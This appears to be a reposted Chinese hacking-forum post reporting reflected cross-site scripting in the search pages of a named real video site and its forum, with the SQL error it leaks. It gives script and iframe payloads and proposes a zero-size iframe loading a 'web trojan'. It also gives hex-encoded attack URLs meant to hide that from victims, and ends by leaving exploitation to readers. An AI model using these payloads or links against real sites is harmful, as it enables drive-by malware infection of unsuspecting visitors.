前天黑眼圈发来一个站
http://www.ppstream.com/
让找漏洞
看了下排名.汗.全球排名589..
这样的站安全系数按理来说一定很高的..想从注入方面下手机率不会很大.
看了下主页有个节目搜索.
输入
<script>alert("fhod")</script>
http://so.ppstream.com/?key=<script&g ... ")</script>
出错信息
[handle]QUERY STRING:select count(channel_name) from pps_channel_info where contains(playbill,?,1)>0 Biuld Array:Array
(
[0] =>
)
[Last query: select count(channel_name) from pps_channel_info where contains(playbill,:0,1)>0 ]
[Native code: 29902]
[Native message: ORA-29902: error in executing ODCIIndexStart() routine
ORA-20000: Oracle Text error:
DRG-50900: text query parser error on line 1, column 9
DRG-50905: invalid score threshold ALERT
]
Error Message:MDB2 Error: unknown error
开始输入的
被换成了大写..
<SCRIPT>ALERT("FHOD")</SCRIPT>
但却不提示.
试着搜索
<iframe src=http://www.ciker.org/ width=200 height=200></iframe>
呵.看到了把..如果把width和height都设置为0
地址换成我们的网马..
发给别人一个这样的地址会不会被怀疑呢
http://so.ppstream.com/search/?key=%3Ciframe+src%3Dhttp%3A% ... th%3D200+height%3D200%3E%3C%2Fiframe%3E
经过编码地址为
http://so.ppstream.com/search/?key=%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%63%69%6B%6 ... %30%30%20%68%65%69%67%68%74%3D%32%30%30%3E%3C%2F%69%66%72%61%6D%65%3E
另外
http://club.ppstream.com/
也存在同样的问题
搜索
<script>alert("fhod")</script>
同样的原理
搜索iframe也是可以的.
编码后
http://club.ppstream.com/index.php?m=search&search_text=%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%63%69%6B%65 ... 68%65%69%67%68%74%3D%32%30%30%3E%3C%2F%69%66%72%61%6D%65%3E&search_type=2&x=22&y=8
怎么利用就随大家喜欢了..
文章转载地址:http://www.cnpaf.net/Class/hack/0610111514049845464.html